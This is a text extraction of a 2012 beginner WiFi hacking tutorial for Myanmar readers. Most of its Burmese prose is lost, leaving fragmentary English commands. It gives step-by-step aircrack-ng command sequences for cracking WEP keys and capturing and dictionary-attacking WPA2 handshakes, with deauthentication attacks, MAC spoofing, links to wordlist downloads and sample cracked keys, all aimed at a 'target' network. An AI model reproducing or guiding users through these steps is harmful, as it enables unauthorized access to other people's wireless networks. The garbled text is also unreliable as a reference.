You are on page 1of 24

10100101010101010101011010101

01010101010101010101001010101
01010101010101010101010101011
01010110101001010101001010010
WiFi Internet Connection Hacking
10010100101010101010101010101
WEP,WPA2 Penetration Testing
01010101010101010101010101010
3thic0kiddi3
10101010101010101010101010101
01010101010101101010101010101
01011010101010101010101010101
01010101010101010101010101010
10101010101010101010101010101
01010101010101010101010101001
01010101010010101010010101010
01101010010101010101010101010
10110101010101010101010101010
10101010101010101010101010100
5/27/2012
For Myanmar IT Begineers (Myanmar version)

Wifi Hacking Basic By 3thic0kiddi3



( )


Educational Purpose Only

Beginner Level

WEP WPA

..

Laptop Xp 7 Wireless USB adapter

TP-Link Wireless adapter 15000


(Laptop Wireless ) Back Track 5 , VM ware
( :P)

Laptop Browser
Back Track 5 www.backtrack-linux.org

Back Track 5R2 Back Track 5 Download
GNOME 32 Bit VM Ware Direct



Back Track 5 Zip
VM ware www.vmware.com/products/player
VM ware

VM ware Install
File >open virtual machine Back Track 5 zip

Play Virtual Machine Back Track 5 Back Track Boot


Boot

Boot Bt login bt login root Password toor


root@bt startx VM Ware BT 5

Windows 7 Back
Track 5 Back Track Linux
Security Hacker
Linux Back Track

(WEP Cracking)
Wifi WEP WPA WPA2
Google Beginner WEP
WPA WEP
WEP
Connector

WEP, WPA2-PSK
Wireless USB adapter VM ware
Back Track 5 Back Track Terminal Terminal
Windows cmd Command
Command
airmon-ng Enter Interface ,Chipset wlan0 adapter
detail Adapter BT5

Command airmon-ng start wlan0 Enter


Command airodump-ng mon0 Enter
WEP WPA2
Target wifi WEP (WPA hack )
WEP

laptopdct WEP
WPA2
Laptopdct BSSID
C8:3A:35:2F:E7:30 BSSID CH CH Channel
laptopdct Channel (CH) 11 Command
airodump-ng w tuan c 11 --bssid C8:3A:35:2F:E7:30 mon0

tuan (File name) -c


Terget CH C8:3A:35:2F:E7:30 Terget BSSID
Enter Target Data

Terminal aireplay-ng -1 0 -a C8:3A:35:2F:E7:30 mon0

Enter Request Send (sending auth)


Command
aireplay-ng -3 -b C8:3A:35:2F:E7:30 mon0 Request
Read Read Data
Target

Data C8:3A:35:2F:E7:30
BSSID Aireplay command
-1 0 2 3
Command
Data
Data Read packet Crack
aircrack-ng tuan-01.cap Tuan
tuan

ethickiddie Command aircrack-ng ethickiddie-01.cap


Terminal ls aircrack
Opening tuan-01.cap Crack

Aircrack Key Found


Key C
rack

Key 3132333132 Target Password Key

A3:B5:C11:34:U7:F8:9Q:33 A3B5C1134U7F89Q33
WEP Cracking

WEP
Wifi WEP WPA2
WEP BSSID
Restart Network
Crack Computer
Mac address Filter

WPA2 Cracking ( )
()
WEP WPA
.WPA2 Packet Sniffing ?Dictionary
attack Beginner Dictionary attack
Packet Sniffing Dictionary attack
password Wordlist Crack
WPA2 special character Strong Password
wordlist
WPA2 Dictionary att
Target
wordlist

wordlist 1.1million wordlist.txt darkc0de.lst


Google WPA2 Crack wordlists
4share. 1.1 million wordlist darkc0de.lst
(1)1.1million wordlist.txt download
http://www.4shared.com/office/tvijWEkA/11million_word_list.html
(2)darkc0de.lst download
http://www.4shared.com/file/AF3e-0Em/darkc0de.html
Back Track 5 1.1 million list darkc0de

Backtrack 5 (move)
Windows desktop

Command box (terminal) airmon-ng Enter


Adapter Name

Command airmon-ng start wlan0 Enter


Command airodump-ng mon0 Enter
(WPA2-PSK)
Backt WPA2-CCMP-PSk

Backt BSSID F8:DB:7F:46:1D:A1 Channel (CH) 1


Target D
ata Command
airodump-ng -w WPACap -c 1 mon0 WPACap

-c 1 Channel no.

Command Terminal
aireplay-ng -0 0 -a {BSSID } -c {Client Mac} mon0 Enter

{router mac} Target BSSID {Client Mac}


Target STATION
Target Data Aireplay Command
Data Send Target
Sending

Command

aircrack-ng -w /root/desktop/1.1million wordlist.txt WPACap-01.cap Desktop


1.1 million wordlist.txt
wordlist file /pentest Pentest
WPAcap-01.cap File name
Terminal ls 3thic0kiddi3
3thic0kiddi3-01.cap

Aircrack Wordlist Password


Target Wordlist
darkc0de.lst Wordlist

WPA2 Hacking

WPA2 Cracking ()
WPA2 Crack Mac Changer Method
Mac Change Client

Command airmon-ng start wlan0
ifconfig mon0 down Enter
MAC macchanger -m 00:11:22:33:44:55 mon0
Fake Mac MaC
00:11:22:33:44:55
ifconfig mon0 up

airodump-ng mon0
WPA2 Victima Target

Target Command
airodump-ng -c 6 --bssid 1C:7E:E5:32:1D:54 -w crack mon0
(- Channel No. BSSID No. Target )
Target Data

Terminal
aireplay-ng -0 30 -a {B
SSID} -c {Client Mac} mon0

Aireplay Target Request Sending


WPA Handshake Crack

Terminal
aircrack-ng -w /root/Desktop/darkc0de.lst crack-01.cap Enter

Darcode 1.1 million words list Word list D


esktop
root Desktop Crack-01.cap
aircrack Words List Password Crack
Key

Key Found=abril4de1969
Cracking Time

WPA2 Cracking ()

WPA2
WPA 2 Password Default
Password Mac address
Filter
Hide
Wordlist
Hack restart

MY Book Ref: Youtube(WEP,WPA2) Hacking,BT 5 wireless penetration testing book

You Tube Video Training ::::::.. :::.:: .


http://www.youtube.com/watch?v=y9XV2MBPM5M
http://www.youtube.com/watch?v=FZso9pofw-0
http://www.youtube.com/watch?v=rzzgzP4hEo0
http://www.youtube.com/watch?v=T3iDWP2xeFw
http://www.youtube.com/watch?v=dB21RAvbcDQ
http://www.youtube.com/watch?v=aKQiAAzmW90&feature=fvsr
http://www.youtube.com/watch?v=BiJp9ZajJlg&feature=fvsr
Video Link Download WEP,WPA2 Crack
Video

Share
3thic0kiddi3@gmail.com Hacking Cyber Law

2nd Edition

I like all Hackers from BHG,MHF,MHU,Planet Creator,MZ,MCT,Ghost Area


::::::::::Next books Coming Soon see you:::::

3thic0kiddi3
3thic0kiddi3@gmail.com

You might also like